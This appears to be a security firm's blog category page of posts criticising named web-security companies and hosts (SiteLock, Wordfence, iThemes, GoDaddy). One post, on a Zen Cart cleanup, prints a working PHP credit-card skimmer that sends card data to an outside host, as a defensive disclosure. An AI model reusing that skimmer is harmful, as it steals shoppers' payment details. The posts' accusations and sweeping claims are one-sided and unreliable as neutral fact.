Category: Bad Security

SiteLock Hosting Partner Gets Majority of Fees For SiteLock Services

When it comes to web security companies, our experience has been that most of them don’t seem know and or care about security, which we think that goes a long way to explaining why web security is in such bad shape. One company that fits that bill for that is SiteLock, as can be seen in just few of our previous posts on them, whether its them failing to properly clean websites, to claiming website was secure when it contained malicious code to compromise credit credentials, to falsely claiming that WordPress websites have vulnerabilities due not understanding how WordPress handles security. More recently SiteLock has sets itself apart from the average bad security company in our eyes, by combining that with activity that looks more like outright scamming.

In looking into SiteLock one of the things that has stood out for us is that they have partnerships with with so many web hosts. Based on their poor track record when it comes to security we assumed that that the partnerships had to do with money being paid to the web hosts and not on those web hosts feeling that SiteLock providing a quality service. This seemed even more true as the complaints have piled up against SiteLock, which have frequently also cited their partnered web hosts. If it wasn’t about money, they easily could have found another security company to partner with that wouldn’t damage their reputation in this way.

As we discussed yesterday, it turns out that part of the actual explanation for why some web hosts had partnered with SiteLock has a more troubling explanation. The CEO of Endurance International Group, which provides web hosting services under a variety different brand names (including A Small Orange, Bluehost, FatCow, HostGator, HostMonster, iPage, and IPOWER) is also one of the majority owners of Sitelock (a board member of Endurance International Group is the other majority owner along side them).

While looking into that situation we found confirmation that at least with that company, they are getting a portion of the fees for SiteLock’s services. As noted here in the prepared remarks for earning conference call in May of last year Endurance International Group disclosed that they get a majority of the SiteLock fees from their partnership (PDF):

The revenue share between Endurance and IBS for Sitelock has been set at 55%/45% in favor of Endurance.

That goes a long way to explaining why web hosts are willing to get involved with SiteLock, despite the potential damage to their reputation. Consider this comment on one of our previous posts:

Listen to this: Bluehost persuaded me to get Sitelock security for my website and I stupidly paid $500 for a year. This was in January. Yesterday, Sitelock alerted me to malware on my site that could result in terrible consequences. They would remove the malware for a one-time fee of $300! I contacted them to say, “WHAT WAS THE $500 for??” and a hostile character calling himself “sean” told me it was for “scanning.” This company needs to be stopped from continuing their predatory practices.

The web host would be getting $275 a year without having to do any work, versus the $131.88 they would receive for what they claim is their most popular shared web hosting plan at its normal price (for which they would also have the expenses associated with provide the web hosting).

This also seems to go a long way to explaining why SiteLock’s services sometimes come with extremely high prices, since they are getting less than half of the fee being paid.

If you wondering how much money we are talking about, the conference call remarks also listed the payout they made to SiteLock in financial year 2014:

 Revenue share payments to IBS related to Sitelock totaled $5.4 million in FY14.

One of SiteLock’s Owners is Also The CEO of Many Of The Company’s Web Hosting Partners

SiteLock is a web security company that we had originally became aware and wrote a number of posts about due to our seeing the poor quality of their services when working on client’s websites that had previously used their services. Due to those posts we started started getting contacted about more serious issues with them, namely that in a lot of cases they seem to be scamming people. One of the things that has stood out to us in looking into the situation was the fact that so many web hosts have partnered and continued to stay partnered with them. Was the money that we assumed SiteLock was paying them for the partnership worth the damage to their reputation, seeing as in complaints about them the web host who had partnered with them is frequently brought up?

In looking for some information for another post about the company we ran across the fact that the CEO of a major web hosting provider is also the one of the owners of SiteLock (the other owner is a director of the same provider), which does a lot to explain their partnerships and also raises even more question as to the probity of what is going between them.

On the about page of SiteLock’s website there is no mention of the ownership of the company, doing a Google site search of their website didn’t bring up any mention of either of the two entities that appear to be their parent company.

On the website of one of those, UnitedWeb, SiteLock is shown as one of their brands of the company, while the web hosting companies Endurance International Group and IPOWER are listed as public companies:

unitedweb-brands

The connection between of all of those entities isn’t clear based on that, though.

A little searching brought us to this page that seemed to point to a direct connection between SiteLock and Endurance International Group, which with more checking seems to be confirmed. In Endurance International Group latest quarterly report it states that:

The Company also has agreements with Innovative Business Services, LLC (“IBS”), which provides multi-layered third-party security applications that are sold by the Company. IBS is indirectly majority owned by the Company’s chief executive officer and a director of the Company, each of whom are also stockholders of the Company.

What is Innovative Business Services? That is the entity that owns SiteLock (referred to as a member on that page). So the CEO and a director of Endurance International Group are the owners of SiteLock.

It not clear where UnitedWeb falls in that, but it looks like it might be the owner of Innovative Business Services, and then in turn that is owned by the CEO and directory of Endurance International Group.

Unless you are very involved in website hosting you probably don’t recognize the name Endurance International Group, but they own many well known web hosts. The brands page of their website they highlight some of the more high profile ones including A Small Orange, Bluehost, FatCow, HostGator, iPage, and IPOWER:

endurance-international-group-brands

But that just scratches the surface, here is the all of their current brands (most of them appear to be web hosting companies) as listed on the Wikipedia page for the company:

  • 2slick.com
  • AccountSupport
  • Arvixe LLC
  • A Small Orange
  • ApolloHosting
  • AppMachine
  • Berry Information Systems L.L.C.
  • BigRock
  • BizLand
  • BlueBoxInternet
  • BlueDomino
  • Bluehost
  • BuyDomains
  • CirtexHosting
  • Constant Contact
  • Directi
  • Dollar2Host
  • Domain.com
  • DomainHost
  • Dot5Hosting
  • Dotster
  • easyCGI
  • eHost
  • EmailBrain
  • EntryHost
  • Escalate Internet
  • FastDomain
  • FatCow
  • FreeYellow
  • Glob@t
  • Homestead
  • HostCentric
  • HostClear
  • HostGator
  • HostNine
  • HostMonster
  • HostV VPS
  • hostwithmenow.com
  • HostYourSite.com
  • HyperMart
  • IMOutdoors
  • Intuit Websites
  • iPage
  • IPOWER/iPowerWeb
  • JustHost
  • LogicBoxes
  • MojoMarketplace.
  • MyDomain
  • MyResellerHome
  • MySocialSuite
  • NetFirms
  • Networks Web Hosting
  • Nexx
  • PUBLICDOMAINREGISTRY.COM
  • PowWeb
  • PureHost
  • ReadyHosting.com
  • ResellerClub
  • Saba-Pro
  • SEO Gears
  • SEO Hosting
  • SEO Web Hosting
  • Site5
  • Southeast Web
  • SpeedHost
  • Spertly
  • StartLogic
  • SuperGreen Hosting
  • Typepad
  • Unified Layer
  • USANetHosting
  • vDeck
  • Verio
  • VirtualAvenue
  • VPSLink
  • Webzai Ltd.
  • WebHost4Life
  • webhosting.info
  • Webstrike Solutions
  • Xeran
  • YourWebHosting

Its Not Hard To Find The Source of a Credit Card Compromise in Zen Cart If You Know What You Are Doing

When it comes to dealing with hacked websites there are lots of people who feel it is appropriate for them to do that work without seeming to have any of the expertise needed to be able to properly do the work. We often see the end result of that when we are brought in to re-clean hacked websites after somebody else did it and then the website got re-hacked. We usually find that the original people doing the cleanup didn’t even attempt to do central parts of the cleanup (like determining how the website was hacked). The lack of expertise also showed up recently we were contacted about a Zen Cart based website where credit card information was seeming to be compromised on the website, as fraudulent charges were being made to credit card accounts after they were used on the website.

When we were contacted about this we were confused by a question raised, which was if we charge if were not able to find the vulnerability. Why would someone charge if they were not able to complete the work? In answering that, we were told that other people had looked into this and had not been to identify the problem. That seemed odd to us, since we have never had a problem finding the source of a credit card breaches in the past. The fact that the people that couldn’t find it were then recommending resolving the by upgrading Zen Cart, seemed to point the not knowing what they are doing at all (since upgrading the software on a website is not the proper way to clean up a hacked website). But maybe the code that was compromising the credit card information was well hidden?

One of the easiest thing to do when looking for malicious code on a website is to compare the contents of its files to a freshly downloaded copy of the software being used on it. When we did that with this website we found that one of the files modified from its original form was /languages/english/checkout_confirmation.php. Based on the file’s name that would seem to be possible location where the code to compromise credit card information might be. The modification involved the following code having been appended to the file:

$data1 = $_POST['paypalwpp_cc_firstname'];
$data2 = $_POST['paypalwpp_cc_lastname'];
$data3 = $order->billing['street_address'];
$data4 = '';
$data5 = $order->billing['city'];
$data6 = $order->billing['state'];
$data7 = $order->delivery['postcode'];
$data8 = $order->billing['country']['iso_code_2'];
$data9 = $order->customer['telephone'];
$data10 = $_POST['paypalwpp_cc_number'];
$data11 = $_POST['paypalwpp_cc_expires_month'];
$data12 = $_POST['paypalwpp_cc_expires_year'];
$data13 = $_POST['paypalwpp_cc_checkcode'];
$data14 = ''; // credit card owner
$data15 = "[redacted domain name]";
$data16 = $order->customer['email_address'];
$data17 = ''; // county
$post77 = "firstname=".($data1)."&lastname=".($data2)."&street1=".($data3)."&street2=".($data4)."&city=".($data5)."&state=".($data6)."&zip=".($data7)."&country=".($data8)."&phonenumber=".($data9)."&ccnumber=".($data10)."&expmonth=".($data11)."&expyear=".($data12)."&cvv=".($data13)."&comment1=".$data14."&comment2=".$data15."&email=".($data16)."&county=".($data17);
$url = "http://magecard.xyz/add";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url); // set url to post to
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);// allow redirects
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); // return into a variable
curl_setopt($ch, CURLOPT_TIMEOUT, 60); // times out after 4s
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post77);
$result = curl_exec($ch); // run the whole process
curl_close($ch);

Even if you not an all that familiar with PHP code it is pretty obvious that this code has something to do with credit card information. Combine that with the fact that that code is so different that legitimate code in the file, which involves defining the language to be used on the checkout confirmation page:

define('NAVBAR_TITLE_1', 'Checkout');
define('NAVBAR_TITLE_2', 'Confirmation');

define('HEADING_TITLE', 'Step 3 of 3 - Order Confirmation');

define('HEADING_BILLING_ADDRESS', 'Billing/Payment Information');
define('HEADING_DELIVERY_ADDRESS', 'Delivery/Shipping Information');
define('HEADING_SHIPPING_METHOD', 'Shipping Method:');
define('HEADING_PAYMENT_METHOD', 'Payment Method:');
define('HEADING_PRODUCTS', 'Shopping Cart Contents');
define('HEADING_TAX', 'Tax');
define('HEADING_ORDER_COMMENTS', 'Special Instructions or Order Comments');
// no comments entered
define('NO_COMMENTS_TEXT', 'None');
define('TITLE_CONTINUE_CHECKOUT_PROCEDURE', '<strong>Final Step</strong>');
define('TEXT_CONTINUE_CHECKOUT_PROCEDURE', '- continue to confirm your order. Thank you!');

define('OUT_OF_STOCK_CAN_CHECKOUT', 'Products marked with ' . STOCK_MARK_PRODUCT_OUT_OF_STOCK . ' are out of stock.<br />Items not in stock will be placed on backorder.');

It is hard to see how this could have been missed unless the people trying to find it had no business getting involved in working on something like this.

As to the what allow the code to be added to the website, we were only able to track it back to a Russian IP address that looked to have already gained some level of access to the website. As they were able to login in to the Zen Cart backend and look to have been able to read and write to files on the website.

SiteLock Spreading False Information About WordPress’ Security To Their Customers Through Their Platform Scan for WordPress

A couple weeks ago we had a post about the WordPress security company Wordfence’s scary lack of security knowledge, which something they certainly are not alone in among security companies with a focus on WordPress. Another such company is SiteLock, that in a recent post announcing a new feature that is supposed to warn of known vulnerabilities in WordPress, showed they lack a basic of understanding of how WordPress handles security issues, leading to SiteLock warning their customers of WordPress vulnerabilities that don’t actually exist on their websites.

In the fourth paragraph of the post they say something that would red raise a big red flag from anyone who actually some knowledge of WordPress security:

Vulnerabilities can range from cross-site scripting (XSS) and SQL injection (SQLi), to authorization bypass. Issues are presented with their name, category, severity, a summary of the issue, and a more detailed description. For example, when scanning a WordPress website running v3.9.13, many serious vulnerabilities are found detailed in the scan report.

The reason for the red flag is that WordPress 3.9.13 is the latest version of WordPress 3.9, so that version should have little to no known security vulnerabilities. To understand why that it helps to understand how WordPress handles security updates. Back in WordPress 3.7 a new feature, automatic background updates, was introduced. This allows WordPress to automatically update between minor versions, so a website would automatically updated from 3.9.12 to 3.9.13, but would not automatically update to 4.0. Alongside of that WordPress started releasing security updates for older versions of WordPress that contain that feature, even as they moved on to newer versions of WordPress. So for example when the security release 4.5.3 was put out, so was 3.9.13, with the same fixes.

So while you should be keeping up to date with WordPress, if you are running WordPress 3.7 or above you should still be relatively secure against WordPress vulnerabilities since you would normally be getting those security updates. If you deal with the security of WordPress websites and in particular if you deal with cleaning up hacked websites, this is something you absolutely should know since it plays an important role in the determining the possible sources of the hack. SiteLock does those things, but clearly isn’t aware of this. Which you can tell by screenshot of their scan report warning about a couple of “Critical” severity vulnerabilities in WordPress 3.9.13 that don’t actually exist in that version:

[The following image is missing because SiteLock doesn’t want to you to be able see text they copied from other people’s websites.]

sitelock-false-wordpress-vulnerabilities

For the first, it was fixed in 3.9.8, which includes the same fixes as 4.2.4:

From the announcement post, WordPress 3.9.8 fixes three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site (CVE-2015-2213).

It also includes a fix for a potential timing side-channel attack and prevents an attacker from locking a post from being edited.

For the second, it was fixed in 3.9.4, which includes the same fixes as 4.1.2:

From the announcement post:

  • A serious critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site.
  • Files with invalid or unsafe names could be upload.
  • Some plugins are vulnerable to an SQL injection attack.
  • A very limited cross-site scripting vulnerability could be used as part of a social engineering attack.
  • Four hardening changes, including better validation of post titles within the Dashboard.

The final paragraph of their post doesn’t show good grasp of the reality of securing WordPress websites:

In WordPress security, knowing you have a vulnerability is half the battle. Taking action to remediate vulnerabilities is the other half. Fortunately, as many WordPressers know, the majority of issues found will likely be resolved by simply updating the WordPress core, plugins and themes. However, most WordPress users don’t regularly check the WordPress.org forums or subscribe to notifications about plugins, so they may not be notified of major security issues that haven’t yet been patched. With the new Platform Scan for WordPress, we are increasing the visibility of security concerns to help you be the most informed WordPress user you can be.

Your focus should be first and foremost on keeping the software on your website up to date, since the reality is that you will not always know if a new version includes a security fix. So knowing about vulnerabilities is much less than “half the battle”. Another problem, we know from running our Plugin Vulnerabilities service, is that even if “regularly check the WordPress.org forums or subscribe to notifications about plugins” you won’t know about many unpatched vulnerabilities out there, as lots of vulnerabilities appear to be known and being exploited by hackers, but no one has been noticing them, until we started actually doing the work needed to find them. So could SiteLock play a similar role? It is possible, but based on their track record and the fact that they look to be just reusing existing vulnerability data (which doesn’t even include many vulnerabilities that we have disclosed that exist in the current versions of plugins) it seems unlikely. If you want to be most informed WordPress user when it comes plugin vulnerabilities then signing up for our service would do that over SiteLock’s.

SiteLock’s post doesn’t say where their data comes from (which raises another red flag), but what is shown in the scan results screenshot in their post it looks they are using data from the WPScan Vulnerability Database and adding in some additional information from the US-CERT/NIST. Considering that we have found that the WPScan Vulnerability Database has some serious quality issues when it comes to their listing of plugin vulnerabilities, SiteLock’s data is likely to also likely to have those issues as well.

We would have placed a comment on their post letting them of the problem with their data, but they don’t allow comments (maybe because they would be inundated with complaints about how they treat their customers).

Use of Very Outdated Versions of WordPress Security Plugin Is a Reminder of the Challenges to Improving Security

In cleaning up lots of hacked WordPress websites over the years one thing that we have noticed fairly often is that there are security plugins installed (that clearly didn’t actually protect the website from being hacked, since it got hacked) and on those websites the security plugin(s) and other installed plugins haven’t been kept up to date. Keeping the plugins up to date is going provide you a lot more protection than a security plugin is going to provide (if the security plugins provide any protection at all), so that combination surprised us at first. Even with that knowledge, something we ran across recently stuck out to us.

While doing some checks over security plugins for security issues in them for our Plugin Vulnerabilities service, we recently spotted a couple in the plugin Centrora Security. We have notified them of the issue and hopefully the vulnerabilities will be fixed soon. While looking over the plugin we noticed on the plugin’s Stats page that most of the active installs seem to be running quite out of date versions.

The current release, 6.5, is only used on 26.8 percentage of the websites using it according to wordpress.org’s data:

centrora-security-versions-in-use

The breakdown for the other versions shown there are:

  • 1.0: 12.5%
  • 1.6: 29.2%
  • 2.2.: 11.9%
  • other: 19.6%

One possible explanation for that could have been that the plugin had jumped a lot of versions recently, but looking back at when the older versions were released shows that isn’t the case here. Version 1.0 was superseded with version 1.5 on February 13, 2013. Version 1.6 was superseded with version 2.0 on September 10, 2013. Version 2.2 was superseded with version 3.0 on April 4, 2014.

Another possibility would be that websites using the plugin are still on an older version of WordPress that isn’t’ compatible with newer versions of the plugin. The current version is listed as requiring WordPress version 3.7 or higher, which would make it compatible with the vast majority of WordPress websites based on WordPress’ chart of versions of WordPress currently being used:

wordpress-version-in-use-chart

Looking at what versions of WordPress were required for the old releases doesn’t seem to explain this as, as version 1.0.0 of the plugin required WordPress 3.3, version 1.6.0 also required 3.3, and version 2.2.0 required at least 3.5. So it is not as though the websites could be using a much older version of WordPress than 3.7.

When you have people concerned enough about security to install a security plugin, but not update it in years, despite keeping plugins up to date being an import and rather basic security measure, it points to the difficulty that there is in trying to improve the current poor state of security.

Since we are discussing keeping plugins up to date, don’t forget that we offer a plugin that will turn on WordPress’ ability to automatically update plugins, so you can easily keep your plugins up to date.

It’s Scary How Little Wordfence Knows About Security

If you follow the news what seem pretty clear is that cybersecurity is not in good shape these days, whether it’s major credit card breaches at retailers or hacks of high profile organizations, clearly something is very wrong. It seems unlikely that is due to a lack of spending on security products and services, consider that estimates of yearly spending on cybersecurity are in the 10s of billions of dollars and expected to continue to rise. Instead part of the explanation is that much of that money is being spent on products and services from companies that know and or care little about security.

To give you one example, anti-virus software from well known companies Kaspersky Lab, Norton, McAfee, Sophos, and Trend Micro all were found by Google researcher Tavis Ormandy to have had exploitable vulnerabilities in them. When you have to be concerned that security products are increasing your security risk that indicates something is quite wrong. But what is more striking about those vulnerabilities is the ease of exploiting some of these and that they were due in part to the companies doing dumb things. For example, in the case of Norton, quite of few of their products, including enterprise products, were subject to a remote code execution vulnerability that could be exploited by sending an email (it wouldn’t have had to be opened) that was due in part to running code at a higher privilege level than was have been needed.

As we have ramped up our Plugin Vulnerabilities service for keeping track of vulnerabilities in WordPress plugins, we have run across more of what WordPress security companies are up to and what is seen is that are not the exception when it comes to the poor state of security companies. One such example is Wordfence, we have frequently seen things that showed they either didn’t know or care much about security.

What we have wondered for some time though, is it more that they don’t know about security or if they just don’t care about it. To see why that is, take their involvement in the widespread claim that brute force attacks against WordPress admin password are occurring, despite the fact the evidence from Wordfence and other security companies actual shows that they are not. Does Wordfence had no clue what they were talking about or do they know they were telling people a falsehood to help push their product and service, seeing as those wouldn’t be needed if people knew what the malicious login attempts falsely being labeled as part of brute force attacks were most likely part of, dictionary attacks, which can be protected by simply using a strong password. We really were not sure.

In another example, Wordfence made a bold claim about being able to protect against stored XSS attacks, which we found to be false with some simple testing. In that case it could have either been that they were saying something they knew wasn’t true or it could have been that they understand so little about this type of vulnerability that they didn’t understand what incredible claim they were making and that they needed to be very careful about making it without being sure about the claiming.

We think the latest false information put forward them makes it pretty likely that they are lacking a basic understanding of security, which is frightening since so much of the WordPress community is relying on them for information and protection.

In a post about what they say are the most attack plugin vulnerabilities (worth mentioning here is that we recently found that Wordfence seems to be oblivious to vulnerabilities in plugins that are actually the biggest threat) they made a claim that we and they found out surprising, that many of the vulnerabilities being targeted were local file inclusion (LFI) vulnerabilities:

The large number of local file inclusion vulnerabilities that are being exploited is surprising. I should also note that many of these LFI’s were discovered by Larry Cashdollarwho I had the pleasure of seeing speak at Defcon in Las Vegas 2 weeks ago. So I suspect that many of these are being used in an attack script of some kind which may explain their prevalence in the attacks we’re seeing.

The clustering of LFI’s together and Shell exploits together in the list order is odd, but I don’t have a theory to explain that and there is no error in the data that accounts for that. It appears to be coincidence.

Considering that everything we know from monitoring plugin vulnerabilities and dealing with lots of hacked websites is that this type of vulnerability is rarely targeted, this seemed odd. But a quick look at the data they presented showed a simply explanation, local file inclusion vulnerabilities were not actually be targeted. Instead what was being targeted were what we refer to as arbitrary file viewing vulnerabilities (they are also often referred to arbitrary file download or directory traversal vulnerabilities), which are very different.

Before we get in to what each of those type of vulnerabilities is,  it is worth mentioning that Wordfence really had to go out of their way to get this wrong, as can easily seen by the fact that the first five vulnerabilities they listed as being local file inclusion vulnerabilities are actually listed in the linked to advisories as being the following types of vulnerabilities:

Not one of those is listed as listed local file inclusion vulnerability, so Wordfence must have thought they were all wrong.

A local file inclusion (LFI) vulnerability allows an attacker to include a file that exists on the file system of the server the website is on (a remote file inclusion (RFI) vulnerability allows the same with a file that exists somewhere else). For this type of vulnerability to useful to a hacker they either need to be able to place a file on the website or there needs to be a file thats inclusion in this way causing a security issue. Since those do not appear to be readily available in most cases it follow that this type of vulnerability is not often being exploited.

An arbitrary file viewing vulnerability allows viewing the contents of a file that exists on the website. With WordPress websites we frequently see attempts to exploit this type of vulnerability to view the contents of the wp-config.php file. If successful that would provide the attacker with the database credentials associated with the website. For that to be useful the attacker would need to be able to connect to the database, their ability to do that varies greatly depending on the hosting setup. While we see many attempts to exploit this type of vulnerability, we see it being the cause of a website being hacked much less than arbitrary file upload vulnerabilities, which we also see many exploit attempts against.

While Wordfence’s lack of understanding what each of these vulnerabilities would likely has some impact on protecting against them, it would have an even bigger impact on their properly doing hack cleanups (which they also offer) since it greatly helps to understand what security vulnerabilities have existed on the website to determine the source of the hack and the impact the exploitation of a vulnerability could have had.

If you care about security we would recommend you help us get the truth about Wordfence out to a wider audience so that together we can lessen the damage they are doing toward the security of so many websites.

Questionable Support Advice on Dealing With Hacked Websites From WordPress and Norton Safe Web’s Mystery Blacklisting

One of the things we do to keep track of vulnerabilities in WordPress plugins for our Plugin Vulnerabilities service is to monitor the WordPress support forum for threads related to them. In addition to threads that actual relate to that issue, we frequently run into to other security related threads. In doing that we noticed that in many threads a reply containing the same advice is given, which consisted mainly of a series of links. Some of the pages linked don’t seem to provide the best information, so we wondered if the various members providing that reply were actually aware of what they were linking to or if they were just repeating something they had seen others saying. While looking into another issue involving the forum we found that the source of the message was from a series of pre-defined replies for moderators.

While looking into another thread that came up during that monitoring of the forum we came across evidence that one of the links they include, a link to something called Sucuri SiteCheck, may not be the most appropriate to include. In that thread the original poster had written:

Sucuri is showing my site as harmful and is asking for $16/month to fix it, yet my site seems fine, traffic is normal and I have no log in / access problems on any browser or device.

When we went to look to see why Sucuri was claiming the website was harmful, the SiteCheck page was light on details and high on pushing you to use their service:

sucuri-sitecheck-results

Looking at the other two tabs of information, the only issue that they were identifying was that website was blacklisted by “Norton Safe Web”:

sucuri-sitecheck-blacklist-status

It seems to us that a service would be careful in situation where they are not themselves detecting anything malicious, but Sucuri seems to be labeling the website as “Site Potentially Harmful” and “Site Likely Compromised” based only on the fact that Norton Safe Web was blacklisting it. Based on our limited experience with Norton Safe Web, that would seem to not be appropriate because the results we have seen from it in the past have been rather poor.

Looking at what they are claiming to have detected with this website makes us more confident of the position.

Here is what they are reporting as of now:

norton-safe-web-report

You can see they are not claiming that there are any “computer threats” or “identity threats”, just an “annoyance factor”. What the “annoyance factor” isn’t really further explained, with the only information being that  a page is listed as having a “SWBPL” threat. There is no explanation what a “SWBPL” threat is either on the page or through a link. In searching around to try to find out what that is, we found that we were not alone in trying to figure that and that even some people at Norton did not know what it is. The most detailed information we could find was in a thread on the Norton website, where it was stated that:

SWBPL is one of the threat type in safeweb which is based on telemetry which we collect from 3rd party vendor feeds. Since these sites are classified based on the static data it is pron to few FPs

So Norton is apparently warning about the website based on unidentified third-party’s data, which is also apparently prone to  a “few” false positives. That doesn’t really seem like something that should be the source for Norton warning about a website and certainly shouldn’t be used by someone else to make claims as to the security of the website.

Looking at the URL they identified as being a “SWBPL” threat, visiting it normally just returns a “Page not Found” message and when visiting it in some other ways didn’t produce any different result. Without having access to the backend of the website we can’t rule out there is some issue with it, but from the outside there is nothing we could find harmful about it.

We hope that WordPress will review the boiler plate message they provide to those with questions about hacked websites and consider if they are providing the best information in it.

Automattic Helping Security Companies Peddle False Narrative of Brute Force Attacks Against WordPress Admin Passwords

Last week we looked at one example of the poor state of security information surrounding WordPress, security companies falsely claiming that brute force attacks against WordPress admin passwords are happening (and also offering products and services that are supposed to protect against that non-existent threat). That has negative impact on security since you end with a lot focus and concern on something that isn’t actually threat while other issues, like the poor state of WordPress plugin security, which actually leads to websites being hacked, don’t get the focus and concern they should and needs to get.

While security companies being part of the problem isn’t something that really surprises anymore, considering that most of them seem to either know and or care little about security, when other companies that you would expect to be better, are part of the problem, it is surprising to us. That brings us to the company closely connected to WordPress, Automattic, which has among their offerings the plugin Jetpack.

Despite the fact that brute force attacks simply are not happening, protection against them is prominently advertised feature of the Jetpack plugin. As can be seen on the plugin’s page on wordpress.org:

jetpack-plugin-directory-page

and on the features page on the plugin’s website:

jetpack-features-page-security-section

It easy to think the public would be more likely believe that they were happening when they see that.

At the same time the Jetpack website provides further confirmation that brute force attacks are in fact not happening. Going back to our previous post, with a password made up of numbers and letters (upper case and lower case) that is six characters long, there are over 56 billion possible combinations. By comparison according to the website, Jetpack has only blocked over 1 billion attempts:

Jetpack has blocked over one billion malicious log-in attempts aimed at our users’ WordPress websites.

While that might be enough attempts for a brute force attack to succeed if they all occurred on one website, that is a cumulative total across possibly millions of websites and maybe for a period of over a year, so it shows that there are not even close to enough attempts for brute force attacks to be happening.

We hope that Automattic will become more consciousness of the impact they have on the security of WordPress going forward, because it would be a help to us and others that are trying to improve the situation.

GoDaddy’s Managed WordPress Hosting Fails to Provide Important Security Feature

We were recently brought in to deal with a WordPress website that had been hacked multiple times and just re-hacked. In that type of situation one of the first things that should be done is to review the log files available for the website, since those are likely to provide evidence on how the website is being re-hacked and depending on how far the logs go back, how the website was originally hacked.

One of the big problems we find in being able to review the log files of a hacked website, is that often times web hosts only store the log of HTTP activity for a short period, in some cases less than a days worth of logging is available. One of the better web hosts when it comes to this is GoDaddy. With their standard web hosting accounts using their own control panel, they store about a months worth of logging. When using the cPanel control panel instead, the log is stored for a shorter time period by default, but you can enable archiving, so we can at least make sure it stored for a longer period once we get started on the cleanup.

The website we are dealing with in this case though was in GoDaddy’s Managed WordPress hosting account, which we would find out when the client tried to get access to the log files, does not provide any access to the log files. We are puzzled that they manage to provide that in the standard web hosting accounts, but not not in what would seem to us to be a higher end type of account. The explanation for why they can not provide it, is also puzzling, as they say they can’t provide it because the website is hosted in a shared environment. The other web hosting accounts are also on shared environment and yet they manage to provide them there.

If you are concerned about security we would recommend that you not use their Managed WordPress hosting until they resolve this, since if you were to get hacked, you are going to be missing important information needed to properly clean it up (is worth mentioning that many companies that do hack cleanups either don’t know how to do things properly or are cutting corners and don’t review the log files like they should).

While we were looking over the marketing materials for the service we noticed some security claims that are also worth mentioning. One of the “key features” of the service is that they “keep the bad guys away”:

Keep bad guys at bay Your site gets the personal bodyguard treatment, 24/7. Our security team monitors, thwarts, and deflects so you can rest easy.

Seeing as the website we are dealing with got hit multiple times while using this hosting service, their ability to actually protect the websites is is at least limited.

The ability to protect the website is also contradicted by another feature available in one level of account, which removes malware from the website:

Malware scan & removal Hackers can inject malicious code—malware--into your site to steal info or deface your site. With SiteLock Professional Malware scan (included with Ultimate plan), malware’s found and destroyed before it harms you or your customers.

If they were actually able to protect the websites, as they advertise, then there shouldn’t be any malware getting on the website that needs to be removed.

We would also have wondered about the fact that the company SiteLock would be involved in doing hack cleanups on this service, when they can’t do things properly because the logs are not available, if not for the fact that we have seen that SiteLock doesn’t seem to seem to be interested in properly cleaning up websites and is known for taking advantage of their customers.

iThemes Security Uses Non-Existent Threat of Brute Force Attacks To Collect Users’ Email Addresses

When it comes to security companies, trustworthiness is critical, since the average person isn’t going to have the knowledge and skills to understand if the security company is actually doing (or could even possibly do) what they are claiming to do to protect them. Any upstanding security company would therefore be very careful in what they say and do, so if you see a company being less than honest it should be a major red flag when it comes to using their products and services.

That brings us to something we noticed in the WordPress security plugin iThemes Security. When you install the plugin a notice is displayed at the top of pages in the admin area that read “New! Take your site security to the next level by activating iThemes Brute Force Network Protection”

New! Take your site security to the next level by activating iThemes Brute Force Network Protection. Get Free API Key

If you get click the “Get Free API Key” button in that notice you get shown the following page:

Network Brute Force Protection If one had unlimited time and wanted to try an unlimited number of password combinations to get into your site they eventually would, right? This method of attack, known as a brute force attack, is something that WordPress is acutely susceptible to as, by default, the system doesn't care how many attempts a user makes to login. It will always let you try again. Enabling login limits will ban the host user from attempting to login again after the specified bad login threshold has been reached. Network vs Local Brute Force Protection Local brute force protection looks only at attempts to access your site and bans users per the lockout rules specified locally. Network brute force protection takes this a step further by banning users who have tried to break into other sites from breaking into yours. The network protection will automatically report the IP addresses of failed login attempts to iThemes and will block them for a length of time necessary to protect your site based on the number of other sites that have seen a similar attack. To get started with iThemes Network Brute Force Protection, please supply your email address and save the settings. This will provide this site with an API key and starts the site protection. Email Address test@example.com Receive Email Updates Receive email updates about WordPress Security from iThemes.

On that page they accurately describe what a brute force attack is, so clearly they know what it is. What they either don’t know or they are intentionally not telling people is that brute force attacks against WordPress admin passwords are not happening, so you are not taking your site security to the next level by enabling that feature as they claim.

What makes this more troubling is that they are using the non-existent threat of brute force attacks to try to collect users’ email addresses. By default permission to send “email updates about WordPress Security” is also included when doing that and considering in the best case here they are not aware of it pretty basic security fact that brute force attacks are not happening, the quality of the security information they would provide in those email is likely to be poor.

Just based on this it would seem like a good idea to avoid this company and their plugin, but it isn’t the only issue we found with the plugin recently. Back in April we ran across the fact that the plugin had button labeled “One-Click Secure” that didn’t do anything.